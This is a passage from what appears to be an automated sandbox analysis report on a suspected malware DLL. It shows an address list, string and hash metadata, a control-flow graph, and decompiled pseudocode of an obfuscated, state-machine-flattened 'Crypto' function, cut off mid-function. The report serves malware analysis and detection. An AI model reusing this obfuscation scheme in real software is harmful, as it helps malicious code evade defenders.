                                                                                                          0x02ae9cfd
                                                                                                          0x02ae9c96
                                                                                                          0x02ae9c9c
                                                                                                          0x02ae9cdb
                                                                                                          0x02ae9ce0
                                                                                                          0x02ae9ce7
                                                                                                          0x00000000
                                                                                                          0x02ae9ce7
                                                                                                          0x02ae9c9e
                                                                                                          0x02ae9ca4
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae9cc3
                                                                                                          0x02ae9cca
                                                                                                          0x02ae9cca
                                                                                                          0x00000000
                                                                                                          0x02ae9cca
                                                                                                          0x02ae9b05
                                                                                                          0x02ae9c63
                                                                                                          0x02ae9c68
                                                                                                          0x02ae9c6f
                                                                                                          0x02ae9c77
                                                                                                          0x00000000
                                                                                                          0x02ae9c77
                                                                                                          0x02ae9b11
                                                                                                          0x02ae9bf6
                                                                                                          0x02ae9bfb
                                                                                                          0x02ae9bfd
                                                                                                          0x02ae9c26
                                                                                                          0x02ae9c2f
                                                                                                          0x02ae9c37
                                                                                                          0x00000000
                                                                                                          0x02ae9c37
                                                                                                          0x02ae9c06
                                                                                                          0x02ae9c0f
                                                                                                          0x02ae9c11
                                                                                                          0x02ae9c11
                                                                                                          0x00000000
                                                                                                          0x02ae9c11
                                                                                                          0x02ae9b1d
                                                                                                          0x02ae9bd1
                                                                                                          0x02ae9bd6
                                                                                                          0x02ae9bd8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae9bde
                                                                                                          0x00000000
                                                                                                          0x02ae9bde
                                                                                                          0x02ae9b29
                                                                                                          0x02ae9b61
                                                                                                          0x02ae9b68
                                                                                                          0x02ae9bbc
                                                                                                          0x02ae9bbc
                                                                                                          0x00000000
                                                                                                          0x02ae9bbc
                                                                                                          0x02ae9b95
                                                                                                          0x02ae9b9a
                                                                                                          0x02ae9b9d
                                                                                                          0x02ae9ba4
                                                                                                          0x02ae9bb7
                                                                                                          0x00000000
                                                                                                          0x02ae9ba6
                                                                                                          0x02ae9ba6
                                                                                                          0x00000000
                                                                                                          0x02ae9ba6
                                                                                                          0x02ae9ba4
                                                                                                          0x02ae9b31
                                                                                                          0x00000000
                                                                                                          0x02ae9b37
                                                                                                          0x02ae9b50
                                                                                                          0x02ae9b57
                                                                                                          0x00000000
                                                                                                          0x02ae9b57
                                                                                                          0x02ae9f21
                                                                                                          0x02ae9f21
                                                                                                          0x02ae9f27
                                                                                                          0x02aea137
                                                                                                          0x02aea13d
                                                                                                          0x02aea284
                                                                                                          0x02aea28a
                                                                                                          0x02aea3af
                                                                                                          0x02aea3b4
                                                                                                          0x00000000
                                                                                                          0x02aea3b4
                                                                                                          0x02aea290
                                                                                                          0x02aea296
                                                                                                          0x02aea399
                                                                                                          0x02aea39e
                                                                                                          0x00000000
                                                                                                          0x02aea39e
                                                                                                          0x02aea29c
                                                                                                          0x02aea2a2
                                                                                                          0x02aea2db
                                                                                                          0x02aea2fd
                                                                                                          0x02aea319
                                                                                                          0x02aea325
                                                                                                          0x02aea33b
                                                                                                          0x02aea356
                                                                                                          0x02aea381
                                                                                                          0x02aea386
                                                                                                          0x02aea386
                                                                                                          0x00000000
                                                                                                          0x02aea2a2
                                                                                                          0x02aea143
                                                                                                          0x02aea27a
                                                                                                          0x00000000
                                                                                                          0x02aea27a
                                                                                                          0x02aea149
                                                                                                          0x02aea14f
                                                                                                          0x02aea1dd
                                                                                                          0x02aea1e2
                                                                                                          0x02aea1e7
                                                                                                          0x02aea1ea
                                                                                                          0x02aea1ec
                                                                                                          0x02aea1f4
                                                                                                          0x02aea1fb
                                                                                                          0x02aea1fd
                                                                                                          0x02aea218
                                                                                                          0x02aea219
                                                                                                          0x02aea22a
                                                                                                          0x02aea22c
                                                                                                          0x02aea22f
                                                                                                          0x02aea22f
                                                                                                          0x02aea236
                                                                                                          0x02aea239
                                                                                                          0x02aea254
                                                                                                          0x02aea255
                                                                                                          0x02aea264
                                                                                                          0x02aea269
                                                                                                          0x02aea26c
                                                                                                          0x02aea26c
                                                                                                          0x02aea1ee
                                                                                                          0x02aea1ee
                                                                                                          0x02aea1ee
                                                                                                          0x02aea26e
                                                                                                          0x02aea270
                                                                                                          0x00000000
                                                                                                          0x02aea270
                                                                                                          0x02aea151
                                                                                                          0x02aea153
                                                                                                          0x02aea1b4
                                                                                                          0x02aea1b9
                                                                                                          0x02aea1ba
                                                                                                          0x00000000
                                                                                                          0x02aea1ba
                                                                                                          0x02aea155
                                                                                                          0x02aea15b
                                                                                                          0x02aea18c
                                                                                                          0x02aea191
                                                                                                          0x02aea198
                                                                                                          0x00000000
                                                                                                          0x02aea198
                                                                                                          0x02aea15d
                                                                                                          0x02aea163
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aea169
                                                                                                          0x02aea170
                                                                                                          0x02aea172
                                                                                                          0x00000000
                                                                                                          0x02aea172
                                                                                                          0x02ae9f2d
                                                                                                          0x02aea121
                                                                                                          0x02aea126
                                                                                                          0x02aea12d
                                                                                                          0x00000000
                                                                                                          0x02aea12d
                                                                                                          0x02ae9f33
                                                                                                          0x02ae9f39
                                                                                                          0x02ae9fd2
                                                                                                          0x02ae9fd8
                                                                                                          0x02aea106
                                                                                                          0x02aea10b
                                                                                                          0x02aea10d
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aea113
                                                                                                          0x00000000
                                                                                                          0x02aea113
                                                                                                          0x02ae9fde
                                                                                                          0x02ae9fe4
                                                                                                          0x02aea0e4
                                                                                                          0x02aea0e9
                                                                                                          0x02aea0eb
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aea0f1
                                                                                                          0x00000000
                                                                                                          0x02aea0f1
                                                                                                          0x02ae9fea
                                                                                                          0x02ae9ff0
                                                                                                          0x02aea066
                                                                                                          0x02aea06d
                                                                                                          0x02aea072
                                                                                                          0x02aea075
                                                                                                          0x02aea077
                                                                                                          0x02aea0b0
                                                                                                          0x02aea0b7
                                                                                                          0x02aea0ba
                                                                                                          0x02aea0c6
                                                                                                          0x02aea0c8
                                                                                                          0x02aea0d3
                                                                                                          0x02aea0d3
                                                                                                          0x00000000
                                                                                                          0x02aea0d3
                                                                                                          0x02aea0ca
                                                                                                          0x02aea0cd
                                                                                                          0x02ae9f85
                                                                                                          0x02ae9f85
                                                                                                          0x00000000
                                                                                                          0x02ae9f85
                                                                                                          0x00000000
                                                                                                          0x02aea0cd
                                                                                                          0x02aea0bc
                                                                                                          0x00000000
                                                                                                          0x02aea0bc
                                                                                                          0x02aea08f
                                                                                                          0x02aea090
                                                                                                          0x02aea09f
                                                                                                          0x02aea0a4
                                                                                                          0x02aea0a7
                                                                                                          0x02aea0a9
                                                                                                          0x00000000
                                                                                                          0x02aea0a9
                                                                                                          0x02ae9ff2
                                                                                                          0x02ae9ff8
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02aea00c
                                                                                                          0x02aea015
                                                                                                          0x02aea029
                                                                                                          0x02aea02a
                                                                                                          0x02aea039
                                                                                                          0x02aea03e
                                                                                                          0x02aea041
                                                                                                          0x00000000
                                                                                                          0x02aea041
                                                                                                          0x02ae9f3f
                                                                                                          0x02ae9fc3
                                                                                                          0x02ae9fc8
                                                                                                          0x00000000
                                                                                                          0x02ae9fc8
                                                                                                          0x02ae9f41
                                                                                                          0x02ae9f47
                                                                                                          0x02aea401
                                                                                                          0x00000000
                                                                                                          0x02aea401
                                                                                                          0x02ae9f4d
                                                                                                          0x02ae9f53
                                                                                                          0x02ae9fb0
                                                                                                          0x02ae9fb5
                                                                                                          0x00000000
                                                                                                          0x02ae9fb5
                                                                                                          0x02ae9f55
                                                                                                          0x02ae9f5b
                                                                                                          0x02ae9f9a
                                                                                                          0x02ae9f9f
                                                                                                          0x00000000
                                                                                                          0x02ae9f9f
                                                                                                          0x02ae9f5d
                                                                                                          0x02ae9f63
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae9f70
                                                                                                          0x02ae9f75
                                                                                                          0x02ae9f77
                                                                                                          0x02ae9f80
                                                                                                          0x02ae9f80
                                                                                                          0x00000000
                                                                                                          0x02ae9f77
                                                                                                          0x02aea3b9
                                                                                                          0x02aea3b9
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: C$"{6$+>$.MZ$/1$08s%$3}$;w$AW$BO6$C"$C"$Jvmw$Kx!$LNe$Q2N$Reo$S$Tvs$Uj`$W?n$XG$_1$jmI$s2O$t0+$t$|V$E$F$L}
                                                                                                          • API String ID: 0-3734606162
                                                                                                          • Opcode ID: 5d93aa7bf7286ef80e696e191c2b81539de1a45c71195233c863d592b155c1a7
                                                                                                          • Instruction ID: 63a47f1c9025f038d53e992e1e7882d638374194439b9230338f2274e25ccade
                                                                                                          • Opcode Fuzzy Hash: 5d93aa7bf7286ef80e696e191c2b81539de1a45c71195233c863d592b155c1a7
                                                                                                          • Instruction Fuzzy Hash: 0BE201719083818BD7B8DF25C589ADFBBE1BB85318F10891DE5DE96260DBB08949CF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AEA871, Relevance: 24.4, Strings: 19, Instructions: 646COMMONCrypto
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 263 2aea871-2aeb3ee call 2b01f6d 266 2aeb3f0-2aeb3f6 263->266 267 2aeb3fc 266->267 268 2aeb679-2aeb67f 266->268 269 2aeb652-2aeb674 call 2b02b09 267->269 270 2aeb402-2aeb408 267->270 271 2aeb7ba-2aeb7de call 2b00a64 268->271 272 2aeb685-2aeb68b 268->272 269->266 273 2aeb40e-2aeb414 270->273 274 2aeb5b7-2aeb64d call 2afe1f8 call 2b044ad call 2affecb 270->274 295 2aeb7ea 271->295 296 2aeb7e0-2aeb7e5 271->296 276 2aeb780-2aeb7b5 call 2afd8db 272->276 277 2aeb691-2aeb697 272->277 280 2aeb57a-2aeb5b2 call 2af85ff 273->280 281 2aeb41a-2aeb420 273->281 274->266 276->266 284 2aeb73d-2aeb77b call 2ae1a34 277->284 285 2aeb69d-2aeb6a3 277->285 280->266 289 2aeb45f-2aeb56a call 2b00db1 call 2af09dd call 2aebaa9 call 2afe1f8 call 2b02d0a call 2affecb call 2aebfbe 281->289 290 2aeb422-2aeb428 281->290 284->266 293 2aeb7ef-2aeb7f5 285->293 294 2aeb6a9-2aeb72d call 2af0cf9 call 2af00c5 call 2aef726 285->294 305 2aeb815-2aeb81f 289->305 333 2aeb570-2aeb575 289->333 300 2aeb42e-2aeb434 290->300 301 2aeb7fd-2aeb814 call 2b01538 290->301 293->266 297 2aeb7fb 293->297 294->305 325 2aeb733-2aeb738 294->325 295->293 296->266 297->305 300->293 308 2aeb43a-2aeb45d call 2b02b09 300->308 301->305 308->266 325->266 333->266
                                                                                                          C-Code - Quality: 95%
                                                                                                          			E02AEA871(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				signed int _v2608;
				signed int _v2612;
				intOrPtr _v2616;
				intOrPtr _v2620;
				intOrPtr _v2624;
				char _v2628;
				intOrPtr _v2632;
				char _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				unsigned int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				void* _t731;
				signed int _t732;
				signed int _t733;
				signed int _t743;
				signed int _t758;
				void* _t761;
				signed int _t763;
				signed int _t764;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t783;
				void* _t804;
				void* _t861;
				signed int _t865;
				void* _t867;
				signed int* _t868;
				void* _t874;

				_t868 =  &_v2932;
				_v2612 = _v2612 & 0x00000000;
				_v2608 = _v2608 & 0x00000000;
				_v2616 = 0x74b642;
				_v2776 = 0xf885ca;
				_v2776 = _v2776 | 0xffdfd4be;
				_v2776 = _v2776 ^ 0xffffd5d7;
				_v2704 = 0xd88538;
				_v2704 = _v2704 + 0xebcf;
				_v2704 = _v2704 ^ 0x00c97107;
				_v2800 = 0xd52646;
				_v2800 = _v2800 ^ 0xe8dc52fe;
				_v2800 = _v2800 + 0xffffe935;
				_v2800 = _v2800 ^ 0xe804d8f6;
				_v2688 = 0xbafe67;
				_v2688 = _v2688 + 0x9481;
				_v2688 = _v2688 ^ 0x00b13019;
				_v2884 = 0x3d12e1;
				_v2884 = _v2884 << 1;
				_v2884 = _v2884 * 0x55;
				_t867 = __ecx;
				_t861 = 0xbf2cce3;
				_t763 = 0x73;
				_v2884 = _v2884 * 0xf;
				_v2884 = _v2884 ^ 0x605e8f7b;
				_v2696 = 0xf649d9;
				_v2696 = _v2696 / _t763;
				_v2696 = _v2696 ^ 0x000dd9df;
				_v2764 = 0x4a6242;
				_v2764 = _v2764 + 0xffff45cb;
				_v2764 = _v2764 >> 0xc;
				_v2764 = _v2764 ^ 0x000572e2;
				_v2784 = 0x8333a2;
				_t764 = 0x2e;
				_v2784 = _v2784 / _t764;
				_v2784 = _v2784 + 0xffffe135;
				_v2784 = _v2784 ^ 0x0005b928;
				_v2852 = 0xf9a739;
				_v2852 = _v2852 | 0x42d1f5c6;
				_v2852 = _v2852 + 0xfffff01c;
				_v2852 = _v2852 ^ 0x42f87d02;
				_v2896 = 0x31e192;
				_v2896 = _v2896 << 0xa;
				_v2896 = _v2896 << 0xa;
				_t765 = 0xb;
				_v2896 = _v2896 * 0x26;
				_v2896 = _v2896 ^ 0xbac011ee;
				_v2928 = 0xcde58e;
				_v2928 = _v2928 | 0x2bdbfaea;
				_v2928 = _v2928 << 8;
				_v2928 = _v2928 | 0x4ddc4764;
				_v2928 = _v2928 ^ 0xdffb1335;
				_v2740 = 0xd63953;
				_v2740 = _v2740 + 0x5c5c;
				_v2740 = _v2740 ^ 0x00d7db1f;
				_v2844 = 0x6db889;
				_v2844 = _v2844 + 0x1eed;
				_v2844 = _v2844 / _t765;
				_v2844 = _v2844 ^ 0x0002c3cf;
				_v2796 = 0x98820d;
				_v2796 = _v2796 | 0x8cff8acf;
				_t766 = 0x43;
				_v2796 = _v2796 / _t766;
				_v2796 = _v2796 ^ 0x021946ce;
				_v2668 = 0x18627d;
				_t767 = 7;
				_v2668 = _v2668 / _t767;
				_v2668 = _v2668 ^ 0x00044156;
				_v2772 = 0x2c7378;
				_v2772 = _v2772 >> 0xb;
				_v2772 = _v2772 >> 6;
				_v2772 = _v2772 ^ 0x000b6d9a;
				_v2880 = 0xd4c7fd;
				_t768 = 0x7b;
				_v2880 = _v2880 / _t768;
				_v2880 = _v2880 + 0xffffaacc;
				_t769 = 0x22;
				_v2880 = _v2880 * 0x2f;
				_v2880 = _v2880 ^ 0x00480dcd;
				_v2920 = 0xe4d6f8;
				_v2920 = _v2920 * 0x42;
				_v2920 = _v2920 + 0xa0b6;
				_v2920 = _v2920 << 8;
				_v2920 = _v2920 ^ 0x000574ec;
				_v2640 = 0xd6ae6b;
				_v2640 = _v2640 | 0xbe6f316b;
				_v2640 = _v2640 ^ 0xbefadf9c;
				_v2836 = 0x6fb4;
				_v2836 = _v2836 + 0xffffc368;
				_v2836 = _v2836 >> 0x10;
				_v2836 = _v2836 ^ 0x0009680a;
				_v2724 = 0x8b61bc;
				_v2724 = _v2724 * 0x75;
				_v2724 = _v2724 ^ 0x3fbdc7d4;
				_v2912 = 0x753704;
				_v2912 = _v2912 >> 0xb;
				_v2912 = _v2912 + 0xd457;
				_v2912 = _v2912 << 1;
				_v2912 = _v2912 ^ 0x000d652f;
				_v2716 = 0xde59a0;
				_v2716 = _v2716 + 0xffff5778;
				_v2716 = _v2716 ^ 0x00d8a7a4;
				_v2752 = 0x428dcf;
				_v2752 = _v2752 / _t769;
				_v2752 = _v2752 | 0x08d5d60c;
				_v2752 = _v2752 ^ 0x08d7d48c;
				_v2828 = 0xe83a42;
				_v2828 = _v2828 ^ 0x1f3eb5e2;
				_v2828 = _v2828 * 0x7e;
				_v2828 = _v2828 ^ 0xab9e63e1;
				_v2788 = 0x69d445;
				_v2788 = _v2788 | 0x87a4a8ed;
				_v2788 = _v2788 ^ 0x9a4d3e24;
				_v2788 = _v2788 ^ 0x1da0be74;
				_v2888 = 0x7663d0;
				_v2888 = _v2888 | 0x8f53a1f3;
				_v2888 = _v2888 >> 0xf;
				_v2888 = _v2888 * 0xa;
				_v2888 = _v2888 ^ 0x000d5ba1;
				_v2644 = 0x20e74e;
				_v2644 = _v2644 | 0x742f98e9;
				_v2644 = _v2644 ^ 0x74210d1b;
				_v2904 = 0xfccdb4;
				_t770 = 0xd;
				_v2904 = _v2904 * 0x7c;
				_v2904 = _v2904 >> 0xd;
				_v2904 = _v2904 | 0x17cf49de;
				_v2904 = _v2904 ^ 0x17c7aae5;
				_v2708 = 0xc1d2f2;
				_v2708 = _v2708 + 0xffff5a94;
				_v2708 = _v2708 ^ 0x00cb5d75;
				_v2660 = 0x58d6fe;
				_v2660 = _v2660 + 0x639e;
				_v2660 = _v2660 ^ 0x00518056;
				_v2652 = 0x6bd84b;
				_v2652 = _v2652 + 0xb95a;
				_v2652 = _v2652 ^ 0x00624667;
				_v2700 = 0xf92c4f;
				_v2700 = _v2700 * 0x75;
				_v2700 = _v2700 ^ 0x71e1c3ce;
				_v2892 = 0xd4714c;
				_v2892 = _v2892 + 0xffffadfa;
				_v2892 = _v2892 + 0xd7d2;
				_v2892 = _v2892 << 2;
				_v2892 = _v2892 ^ 0x0358083c;
				_v2900 = 0xca6485;
				_v2900 = _v2900 ^ 0x66674751;
				_v2900 = _v2900 | 0x9fb8fe7f;
				_v2900 = _v2900 ^ 0xffb729be;
				_v2824 = 0x9c46e2;
				_v2824 = _v2824 / _t770;
				_t771 = 0x6e;
				_v2824 = _v2824 * 7;
				_v2824 = _v2824 ^ 0x005409ff;
				_v2832 = 0x773d17;
				_v2832 = _v2832 >> 0xe;
				_v2832 = _v2832 + 0x6313;
				_v2832 = _v2832 ^ 0x000d17fa;
				_v2792 = 0x3014cc;
				_v2792 = _v2792 + 0xffff152c;
				_v2792 = _v2792 + 0xffff3bdf;
				_v2792 = _v2792 ^ 0x002eea21;
				_v2864 = 0x76e575;
				_v2864 = _v2864 | 0xb1b1a986;
				_v2864 = _v2864 * 0x79;
				_v2864 = _v2864 ^ 0x1e28dcc7;
				_v2712 = 0xf7e6ad;
				_v2712 = _v2712 * 0xb;
				_v2712 = _v2712 ^ 0x0aae7ee0;
				_v2808 = 0xd4cb39;
				_v2808 = _v2808 * 0x50;
				_v2808 = _v2808 * 0x75;
				_v2808 = _v2808 ^ 0x6440f87f;
				_v2720 = 0x360163;
				_v2720 = _v2720 + 0xffffc3fc;
				_v2720 = _v2720 ^ 0x0035ed30;
				_v2816 = 0xf63972;
				_v2816 = _v2816 / _t771;
				_v2816 = _v2816 + 0xffff69c4;
				_v2816 = _v2816 ^ 0x0001f3af;
				_v2728 = 0x218a6d;
				_v2728 = _v2728 | 0x0e9fd07f;
				_v2728 = _v2728 ^ 0x0eb1edc0;
				_v2756 = 0x58a84f;
				_v2756 = _v2756 * 0x22;
				_t772 = 0x3d;
				_v2756 = _v2756 / _t772;
				_v2756 = _v2756 ^ 0x0033367e;
				_v2680 = 0x526d89;
				_v2680 = _v2680 << 3;
				_v2680 = _v2680 ^ 0x02908fe9;
				_v2876 = 0xb95aa0;
				_t773 = 0x6f;
				_v2876 = _v2876 / _t773;
				_v2876 = _v2876 + 0x7ba5;
				_v2876 = _v2876 | 0x4bff3dbe;
				_v2876 = _v2876 ^ 0x4bf5695e;
				_v2748 = 0x470f02;
				_t774 = 0x6a;
				_v2748 = _v2748 / _t774;
				_v2748 = _v2748 ^ 0x394a4d48;
				_v2748 = _v2748 ^ 0x39498008;
				_v2684 = 0xb8f542;
				_v2684 = _v2684 * 0x66;
				_v2684 = _v2684 ^ 0x49b10479;
				_v2812 = 0x4a6932;
				_v2812 = _v2812 >> 7;
				_v2812 = _v2812 ^ 0xe4afcb01;
				_v2812 = _v2812 ^ 0xe4ae05c3;
				_v2932 = 0xa851a7;
				_v2932 = _v2932 * 0x2b;
				_v2932 = _v2932 ^ 0x9481cb07;
				_v2932 = _v2932 >> 6;
				_v2932 = _v2932 ^ 0x02246e93;
				_v2872 = 0x6bc7af;
				_v2872 = _v2872 ^ 0x3226b467;
				_v2872 = _v2872 * 0x1e;
				_v2872 = _v2872 << 0xb;
				_v2872 = _v2872 ^ 0x9c8deb19;
				_v2860 = 0x8556fb;
				_v2860 = _v2860 | 0x69e02514;
				_v2860 = _v2860 + 0xedcb;
				_v2860 = _v2860 ^ 0x69e8258b;
				_v2676 = 0xb187db;
				_v2676 = _v2676 << 0xb;
				_v2676 = _v2676 ^ 0x8c3acae2;
				_v2656 = 0xd34daf;
				_v2656 = _v2656 >> 0xe;
				_v2656 = _v2656 ^ 0x0009be95;
				_v2804 = 0x3574a6;
				_v2804 = _v2804 >> 9;
				_v2804 = _v2804 * 0x2a;
				_v2804 = _v2804 ^ 0x00009063;
				_v2760 = 0x8f0143;
				_v2760 = _v2760 * 0x43;
				_v2760 = _v2760 >> 3;
				_v2760 = _v2760 ^ 0x04abe301;
				_v2924 = 0x8fc82d;
				_v2924 = _v2924 << 1;
				_v2924 = _v2924 | 0xafdefbbe;
				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E02B01F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							E02B02B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E02AFE1F8(0x2ae19bc, _v2684, __eflags);
								E02B044AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E02AFFECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E02AF85FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E02B00DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E02AF09DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										E02AEBAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E02B02D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0x2ae188c,  &_v2604,  &_v2084, E02AFE1F8(0x2ae188c, _v2640, __eflags));
										E02AFFECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E02AEBFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E02B01538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = E02B02B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = E02B00A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E02AFD8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E02AE1A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E02AF0CF9();
									_t758 = E02AF00C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
